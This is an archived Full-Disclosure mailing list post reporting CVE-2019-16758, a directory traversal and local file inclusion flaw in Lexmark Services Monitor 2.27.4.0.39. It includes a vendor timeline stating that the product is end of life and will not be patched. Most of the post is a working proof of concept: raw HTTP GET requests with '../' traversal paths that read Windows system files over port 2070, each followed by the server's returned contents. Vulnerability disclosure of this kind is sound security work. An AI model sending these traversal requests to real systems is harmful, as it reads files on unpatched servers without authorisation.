lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 18 Nov 2019 08:26:33 -0800
From: Kevin R <krandall2013@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] CVE-2019-16758 Lexmark Services Monitor 2.27.4.0.39 Directory
	Traversal

# Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal
# Google Dork: N/A
# Date: 2019-11-15
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.lexmark.com/en_us.html
# Software Link: https://www.lexmark.com/en_us.html
# Version: 2.27.4.0.39 (Latest Version)
# Tested on: Windows Server 2012
# CVE : CVE-2019-16758


Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on
TCP Port 2070. The latest version is vulnerable to a Directory
Traversal and Local File Inclusion vulnerability.

Timeline:
Discovered on: 9/24/2019
Vendor Notified: 9/24/2019
Vendor Confirmed Receipt of Vulnerability: 9/24/2019
Follow up with Vendor: 9/25/2019
Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019
Vendor Confirmed Vulnerability is Valid: 9/26/2019
Vendor Said Software is EOL (End of Life). Users should
upgrade/migrate all LSM with LRAM. No fix/patch will be made:
9/27/2019
Vendor Confirmed Signoff to Disclose: 9/27/2019
Final Email Sent: 9/27/2019
Public Disclosure: 11/15/2019

PoC:

GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US;
rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20

HTTP/1.0 200 OK
Server: rXpress
Content-Length: 848536


.
.
.
.[.P.e.r.f.l.i.b.].
.
.B.a.s.e. .I.n.d.e.x.=.1.8.4.7.
.
.L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6.
.
.L.a.s.t. .H.e.l.p.=.3.3.3.4.7.
.
.
.
.[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].
.
.F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8.
.
.F.i.r.s.t. .H.e.l.p.=.5.0.2.9.
.
.L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0.
.
.L.a.s.t. .H.e.l.p.=.5.0.4.1.
.
.
.
.[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].
.
.F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6.


GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3

HTTP/1.0 200 OK
Server: rXpress
Content-Length: 38710

..[.S.t.r.i.n.g.s.].
.
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.".
.
.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l.
.p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g.
.k.e.y.).".
.
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.".
.
.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l.
.p.r.o.d.u.c.t. .k.e.y.".
.
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.".
.
.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e.
.W.i.n.d.o.w.s.".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y.
.l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:.
.c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.".
.
.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y.
.d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n.
.(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".
.
.L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.".




GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de)

HTTP/1.0 200 OK
Server: rXpress
Content-Length: 17463

# Copyright (c) 1993-2004 Microsoft Corp.
#
# This file contains port numbers for well-known services defined by IANA
#
# Format:
#
# <service name>  <port number>/<protocol>  [aliases...]   [#<comment>]
#

echo                7/tcp
echo                7/udp
discard             9/tcp    sink null
discard             9/udp    sink null
systat             11/tcp    users                  #Active users
systat             11/udp    users                  #Active users
daytime            13/tcp
daytime            13/udp
qotd               17/tcp    quote                  #Quote of the day
qotd               17/udp    quote                  #Quote of the day
chargen            19/tcp    ttytst source          #Character generator
chargen            19/udp    ttytst source          #Character generator
ftp-data           20/tcp                           #FTP, data
ftp                21/tcp                           #FTP. control
ssh                22/tcp                           #SSH Remote Login Protocol
telnet             23/tcp
smtp               25/tcp    mail                   #Simple Mail
Transfer Protocol
time               37/tcp    timserver

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists